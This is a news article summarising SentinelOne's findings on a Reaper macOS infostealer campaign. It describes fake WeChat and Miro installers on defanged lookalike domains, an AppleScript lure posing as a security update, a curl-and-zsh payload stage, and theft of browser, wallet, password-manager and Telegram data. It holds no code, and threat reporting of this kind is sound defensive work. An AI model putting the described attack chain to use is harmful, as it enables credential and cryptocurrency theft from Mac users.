Security researchers at SentinelOne say a new variant of Reaper Mac malware is actively targeting macOS users by posing as trusted software installers, including a fake WeChat installer. The campaign marks a notable change in tactics, shifting away from the older Terminal-based social-engineering flow and toward an AppleScript attack chain designed to feel more native on the Mac.
According to SentinelOne, Reaper is a derivative of the earlier SHub information stealer. The biggest change is how it gets users to trigger the infection. Earlier campaigns relied on tricking victims into copying commands into Terminal. This newer version instead abuses the applescript:// URL scheme to launch Apple’s Script Editor and preload a malicious AppleScript, making the attack look less suspicious to ordinary users.
The researchers say the attackers are hosting bogus installers on domains that closely resemble legitimate services, especially WeChat and Miro. Example domains cited in the report include lookalike addresses such as qq-0732gwh22[.]com, mlcrosoft[.]co[.]com, and mlroweb[.]com. Once a victim clicks through and runs the script, they may see a fake Apple security update prompt that even references XProtectRemediator in an attempt to lower suspicion.
From there, the script downloads a shell payload with curl and silently executes it through zsh. SentinelOne says the malware first checks whether the system is using a Russian keyboard or input method; if it is, the malware reports a cis_blocked event and exits. If not, it continues by invoking macOS built-in scripting tools and moving into the data-theft stage.
The theft scope is broad. Reaper is reported to target browser data from Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion. It also goes after wallet extensions such as MetaMask and Phantom, plus password-manager extensions including 1Password, Bitwarden, and LastPass. On top of that, it can collect iCloud-related data, Telegram sessions, and developer configuration files.
SentinelOne says the malware includes a Filegrabber module that scans Desktop and Documents folders, prioritizing files under 2MB, while PNG images can be taken up to 6MB each. The overall exfiltration cap is said to be 150MB. If desktop wallet apps such as Exodus, Atomic Wallet, Ledger Live, Electrum, or Trezor Suite are present, Reaper may terminate those apps and replace core application files with a malicious app.asar fetched from its command-and-control server.
In short, this Reaper campaign is dangerous not only because it steals data, but because it can also establish longer-term remote access. For Mac users, the report is another reminder that social-engineering attacks are getting better at blending into familiar system workflows rather than relying on obviously suspicious commands.
